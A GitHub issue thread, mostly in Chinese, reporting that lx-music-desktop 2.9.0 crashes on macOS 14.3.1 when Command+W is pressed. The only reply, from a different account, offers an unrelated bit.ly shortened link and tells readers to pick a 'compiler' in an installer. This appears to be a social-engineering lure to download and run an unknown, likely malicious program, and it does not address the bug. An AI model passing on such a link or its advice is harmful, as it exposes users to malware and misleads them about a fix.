### ISSUE TITLE
[Bug]: Mac尝试使用command+w关闭lx窗口，软件整个卡退

### ISSUE THREAD

**Issue by zericli090725** [lyswhut/lx-music-desktop#2029]
### 解决方案检查

- [X] 我已阅读常见问题(<https://lyswhut.github.io/lx-music-doc/desktop/faq>)，并没有找到解决方案
- [X] 我已搜索issue列表(<https://github.com/lyswhut/lx-music-desktop/issues?utf8=✓&q=>)，并没有发现类似的问题

### 预期行为

Command+w最小化窗口，桌面歌词始终保留，未更新前可以command+w

### 实际行为

Command+w软件卡退

### Lx Music 版本

2.9.0

### 操作系统版本

MacOS 14.3.1

**Comment by maher-nakesh** [comment]
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer
